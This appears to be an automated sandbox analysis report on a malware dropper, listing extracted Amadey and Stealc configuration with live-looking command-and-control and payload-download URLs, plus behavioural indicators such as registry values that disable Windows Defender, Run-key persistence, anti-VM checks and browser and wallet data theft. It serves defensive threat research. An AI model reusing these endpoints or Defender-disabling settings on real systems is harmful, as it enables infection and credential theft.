Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
05/03/2025, 18:33
Static task
static1
Behavioral task
behavioral1
Sample
6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe
Resource
win10v2004-20250217-en
General
-
Target
6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe
-
Size
938KB
-
MD5
fa46bf7e563cae268f877b6868875b6f
-
SHA1
29d2e9285129ee07b476bf864e52dae99676bb42
-
SHA256
6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8
-
SHA512
5cce4d4e042efb139902c69154aa9d343629342bb1aa89e4ffdc140b81c683f6602ad7ad84db3038a36caf6332e43fa85b4f060e87f1da7b0944be089f20b935
-
SSDEEP
24576:AqDEvCTbMWu7rQYlBQcBiT6rprG8a4ru:ATvC/MTQYxsWR7a4r
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/2280-397-0x00000000011E0000-0x0000000001628000-memory.dmp healer behavioral1/memory/2280-393-0x00000000011E0000-0x0000000001628000-memory.dmp healer -
Gcleaner family
-
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" ceea5a1e0e.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" ceea5a1e0e.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection ceea5a1e0e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" ceea5a1e0e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" ceea5a1e0e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" ceea5a1e0e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" ceea5a1e0e.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" ceea5a1e0e.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications ceea5a1e0e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" ceea5a1e0e.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0974c9d1cc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ceea5a1e0e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d0e63d47c9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d45941d81b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 35d7e2eba2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b799061492.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ baf41f08af.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ v6Oqdnc.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2068 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3824 powershell.exe 3216 powershell.exe 2068 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 15 IoCs
flow pid Process 4 2068 powershell.exe 7 700 rapes.exe 8 700 rapes.exe 8 700 rapes.exe 8 700 rapes.exe 8 700 rapes.exe 8 700 rapes.exe 8 700 rapes.exe 8 700 rapes.exe 8 700 rapes.exe 8 700 rapes.exe 8 700 rapes.exe 8 700 rapes.exe 12 884 BitLockerToGo.exe 18 3000 BitLockerToGo.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d0e63d47c9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d45941d81b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 35d7e2eba2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b799061492.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion baf41f08af.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion baf41f08af.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d0e63d47c9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 35d7e2eba2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0974c9d1cc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0974c9d1cc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d45941d81b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b799061492.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ceea5a1e0e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ceea5a1e0e.exe -
Executes dropped EXE 20 IoCs
pid Process 2112 TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE 700 rapes.exe 368 0974c9d1cc.exe 1388 4b99eca92e.exe 112 4b99eca92e.exe 2060 d0e63d47c9.exe 2936 d45941d81b.exe 1388 35d7e2eba2.exe 2340 b799061492.exe 2148 baf41f08af.exe 2636 f4dcb32859.exe 2280 ceea5a1e0e.exe 1708 v6Oqdnc.exe 3440 OEHBOHk.exe 3560 MCxU5Fj.exe 3596 MCxU5Fj.exe 3604 MCxU5Fj.exe 3612 MCxU5Fj.exe 464 Process not Found 3244 ckonftponqgz.exe -
Identifies Wine through registry keys 2 TTPs 10 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine b799061492.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine baf41f08af.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine v6Oqdnc.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine d0e63d47c9.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine ceea5a1e0e.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 0974c9d1cc.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine d45941d81b.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 35d7e2eba2.exe -
Loads dropped DLL 58 IoCs
pid Process 2068 powershell.exe 2068 powershell.exe 2112 TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE 2112 TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE 700 rapes.exe 700 rapes.exe 700 rapes.exe 1388 4b99eca92e.exe 2084 WerFault.exe 2084 WerFault.exe 2084 WerFault.exe 2084 WerFault.exe 2084 WerFault.exe 1720 WerFault.exe 1720 WerFault.exe 1720 WerFault.exe 1720 WerFault.exe 1720 WerFault.exe 700 rapes.exe 700 rapes.exe 700 rapes.exe 700 rapes.exe 700 rapes.exe 700 rapes.exe 884 BitLockerToGo.exe 700 rapes.exe 700 rapes.exe 2380 WerFault.exe 2380 WerFault.exe 2380 WerFault.exe 3000 BitLockerToGo.exe 700 rapes.exe 700 rapes.exe 700 rapes.exe 700 rapes.exe 700 rapes.exe 700 rapes.exe 700 rapes.exe 3232 WerFault.exe 3232 WerFault.exe 3232 WerFault.exe 700 rapes.exe 700 rapes.exe 700 rapes.exe 3560 MCxU5Fj.exe 3560 MCxU5Fj.exe 3560 MCxU5Fj.exe 3668 WerFault.exe 3668 WerFault.exe 3668 WerFault.exe 3668 WerFault.exe 3668 WerFault.exe 3788 WerFault.exe 3788 WerFault.exe 3788 WerFault.exe 3788 WerFault.exe 3788 WerFault.exe 464 Process not Found -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features ceea5a1e0e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" ceea5a1e0e.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\b799061492.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105590101\\b799061492.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\baf41f08af.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105600101\\baf41f08af.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\f4dcb32859.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105610101\\f4dcb32859.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\ceea5a1e0e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105620101\\ceea5a1e0e.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 980 powercfg.exe 3936 powercfg.exe 3928 powercfg.exe 3972 powercfg.exe 3944 powercfg.exe 2576 powercfg.exe 1948 powercfg.exe 3056 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000500000001a438-357.dat autoit_exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe OEHBOHk.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe ckonftponqgz.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 2112 TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE 700 rapes.exe 368 0974c9d1cc.exe 2060 d0e63d47c9.exe 2936 d45941d81b.exe 1388 35d7e2eba2.exe 2340 b799061492.exe 2148 baf41f08af.exe 2280 ceea5a1e0e.exe 1708 v6Oqdnc.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 1388 set thread context of 112 1388 4b99eca92e.exe 41 PID 368 set thread context of 884 368 0974c9d1cc.exe 43 PID 2060 set thread context of 3000 2060 d0e63d47c9.exe 49 PID 3560 set thread context of 3612 3560 MCxU5Fj.exe 85 PID 3244 set thread context of 2660 3244 ckonftponqgz.exe 120 PID 3244 set thread context of 3236 3244 ckonftponqgz.exe 123 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\Tasks\rapes.job TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3980 sc.exe 4044 sc.exe 4084 sc.exe 4092 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
pid pid_target Process procid_target 2084 1388 WerFault.exe 40 1720 112 WerFault.exe 41 2380 2340 WerFault.exe 54 3232 1708 WerFault.exe 79 3668 3560 WerFault.exe 82 3788 3612 WerFault.exe 85 -
System Location Discovery: System Language Discovery 1 TTPs 29 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d45941d81b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4b99eca92e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d0e63d47c9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 35d7e2eba2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v6Oqdnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b799061492.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage f4dcb32859.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language baf41f08af.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f4dcb32859.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language f4dcb32859.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ceea5a1e0e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0974c9d1cc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4b99eca92e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 2700 taskkill.exe 2740 taskkill.exe 2792 taskkill.exe 1108 taskkill.exe 1604 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0c1e67efd8ddb01 powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 d45941d81b.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a d45941d81b.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a d45941d81b.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 35d7e2eba2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 35d7e2eba2.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2852 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 46 IoCs
